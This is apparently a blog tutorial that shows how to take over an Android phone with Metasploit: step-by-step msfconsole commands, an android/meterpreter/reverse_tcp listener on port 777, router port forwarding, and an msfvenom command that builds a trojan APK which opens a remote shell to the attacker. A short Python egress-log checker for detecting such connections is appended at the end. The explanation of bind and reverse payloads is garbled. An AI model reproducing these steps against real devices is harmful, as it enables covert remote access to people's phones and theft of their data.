Usage of the Android platform has increased significantly over the last decade, so it is worth discussing how well it has held up against trojans and today's most prevalent malware.
Just as the Windows platform can be compromised if the necessary precautions are not taken, the same can be said of Android. Over the years various techniques have been used to circumvent the security policies of the Android platform, and Metasploit is one of them.
Metasploit is an exceptionally powerful tool written in Ruby, and it is quite handy as a secondary command-line interface. It provides access to diverse modules, each with an intended task to perform, which are further categorized into sub-modules.
Metasploit is popular among researchers because of its handy interface and the large database of exploits that it offers.
Every day or week, when a new severe vulnerability is discovered, the developers of Metasploit publish it publicly on the ExploitDB platform.
Antivirus software and firewalls are well acquainted with Metasploit payload signatures and with how it obfuscates the payload that is meant to provide backdoor access.
So the AV detects the payload and quarantines it instead of letting it execute, which makes it a strong guard against Metasploit.
Let's see how we can gain access to an Android smartphone with Metasploit:
Open the console (terminal). Check for the weekly updates and update Metasploit if necessary or if new modules are available. Doing so keeps you informed of newly added modules and exploits.
apt install metasploit-framework
After that, start the PostgreSQL database service. Metasploit uses PostgreSQL as its storage database. This lets us quickly navigate and search through Metasploit modules, avoiding the slow search issue that wastes time, while keeping the output organized.
systemctl enable postgresql
systemctl start postgresql
Enabling PostgreSQL starts it every time the system boots, so there is no need to perform this step the next time Metasploit is launched.
Type msfconsole in the terminal and press [Enter]. It takes a few seconds for the interface to become fully functional.
Choose The Exploit
Search for an appropriate exploit for the target OS using the search command. Our target is an Android smartphone, so the query could be:
search type:exploit platform:android
It lists the exploits available for the Android platform. You can get help on Metasploit commands by typing help followed by a space and the command name, such as help search, which prints the manual for the search command. Here's the output for the Android exploit search:
From the list of exploits shown in the image, we will use the generic exploit, as highlighted. Now, to use the exploit, enter this command:
Every exploit comes with a set of payloads. These payloads are actually the exploit modules that provide a backbone environment for transferring and executing commands on the target. Different payloads are used depending on the scenario and on an estimate of how much working space the target offers. To show the payloads available for an exploit, type:
From the given set of payloads, we will use android/meterpreter/reverse_tcp. It is a versatile payload to get started with. It gives us a Meterpreter session if the payload executes undetected. The Meterpreter payload offers a number of commands that are enough to wholly compromise the target system.
At this point we need to know the basic difference between reverse and bind payloads. A bind payload lets you open a connection on the target system, while a reverse payload opens a listening connection on the target machine, making it the host.
As a quick note, bind payloads are more useful when the target is a server or a device that is directly connected to the internet and has a static IP. Reverse payloads are more widely adopted because of the way they work.
Because most computers on the internet are behind NAT, a bind payload is unlikely to work in this situation. Set the payload:
set PAYLOAD android/meterpreter/reverse_tcp
Get information about the exploit using the info command. This is the key step for understanding how the exploit actually works. It gives you background information such as the possible targets and the core of the vulnerability.
At this point, we know how the exploit works. Now we have to set the options for our exploit: LHOST for the local address of the attacker and LPORT for the local port to use. To find the local IP address, type:
So, my local IP is 192.168.1.10. Set LHOST and LPORT:
set LHOST 192.168.1.10
set LPORT 777 # Port for establishing connections
Make sure that both parameters are set correctly.
Run The Exploit
Run the exploit as a job. The exploit will execute in the background and notify you whenever the payload executes on the target system. Afterward, we will use the sessions command to open the (target) session.
Find the gateway IP of your network, navigate to that IP in a web browser and log in. Type:
Now, open a web browser and log in to the router's administrative page.
After a successful login, enable port 777 so that the firewall allows the client and attacker machines to forward and receive traffic. If you don't know how to forward a port on your router, go to PortForward.com, search for your router's make and model, and follow the instructions for your router.
Generate (Infected) Application
To generate the infected (payload) application with the .apk extension, we will use msfvenom, the native payload generator of the Metasploit Framework. Open a new console (terminal) and generate a simple payload application for Android.
msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=Public IP Address (attacker) LPORT=777
- -p: payload to use
- --platform: Target Platform
- -o: Path to place the infected file
- LHOST: Public IP of attacker (local) Machine
- LPORT: Public Port of attacker (local) Machine
Own The Target
As soon as the generated APK file is installed on the Android operating system (target), the Metasploit terminal we left open will give us a live target session. List the available sessions:
Now, to interact with a session, type the session identifier (ID) after the sessions command. It will take you to the Meterpreter shell.
sessions [n] # [n] is the ID of available sessions
A Meterpreter session will be launched. Type the help command. It lists a handful of commands, from getting system info to starting a live chat.
meterpreter > help
Ignore meterpreter > . It's just there to indicate that it's a Meterpreter session.
Let's try the shell command. It brings up the terminal of the target system (or cmd, if it is Windows). Try executing a command.
meterpreter > shell
Android is the most widely adopted operating system, making it the most popular platform, decisively leaving Windows behind and putting its security policies in the spotlight. Just like other platforms, Android can be compromised with a few considerations in mind, and Metasploit is one of the tools that can help with that. However, one must note that Android is usually considered more secure and more dependable than Windows.
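Seen from the phone's own network, the setup above (a payload built with LHOST and LPORT=777, and port 777 forwarded on the attacker's router) appears as a new outbound TCP connection from the handset to an outside address on an unusual port. The following is an added example, not part of the original walkthrough, of an egress check over firewall logs that surfaces such connections; the LAN range, the port allowlist and the iptables-style log lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumed LAN range (the page's 192.168.1.x network) and an example allowlist
# of destination ports phones on it are expected to use; both are assumptions.
INTERNAL_NETS = [ipaddress.ip_network("192.168.1.0/24")]
ALLOWED_DPORTS = {53, 80, 123, 443, 853, 5228}

# Constructed iptables-style LOG lines (not captured traffic).
SAMPLE_LOG = """\
kernel: EGRESS IN=br0 OUT=eth0 SRC=192.168.1.23 DST=198.51.100.20 PROTO=TCP SPT=40112 DPT=443 SYN
kernel: EGRESS IN=br0 OUT=eth0 SRC=192.168.1.23 DST=203.0.113.50 PROTO=TCP SPT=40388 DPT=777 SYN
kernel: EGRESS IN=br0 OUT=br0 SRC=192.168.1.31 DST=192.168.1.10 PROTO=TCP SPT=51002 DPT=777 SYN
kernel: EGRESS IN=br0 OUT=eth0 SRC=192.168.1.40 DST=198.51.100.7 PROTO=UDP SPT=5353 DPT=53
kernel: EGRESS IN=br0 OUT=eth0 SRC=192.168.1.44 DST=203.0.113.9 PROTO=TCP SPT=41500 DPT=4444 SYN
kernel: EGRESS truncated line SRC=192.168.1.23
"""

FIELD = re.compile(r"(\w+)=(\S+)")
REQUIRED = {"SRC", "DST", "PROTO", "DPT"}


def is_internal(addr):
    """True if addr belongs to one of the networks we treat as the LAN."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def suspicious_egress(log_text):
    """Return (src, dst, dport) for new TCP connections that leave the LAN
    on a destination port outside the allowlist."""
    findings = []
    for line in log_text.splitlines():
        f = dict(FIELD.findall(line))
        if not REQUIRED <= f.keys() or f["PROTO"] != "TCP":
            continue
        if "SYN" not in line.split():          # only connection attempts
            continue
        try:
            leaving = is_internal(f["SRC"]) and not is_internal(f["DST"])
            dport = int(f["DPT"])
        except ValueError:                      # bad address or port field
            continue
        if leaving and dport not in ALLOWED_DPORTS:
            findings.append((f["SRC"], f["DST"], dport))
    return findings


if __name__ == "__main__":
    for src, dst, dport in suspicious_egress(SAMPLE_LOG):
        print(f"review: {src} -> {dst}:{dport}")
```

The same allowlist, enforced as a default-deny egress rule for the phone segment instead of only logged, blocks the connection rather than reporting it afterwards.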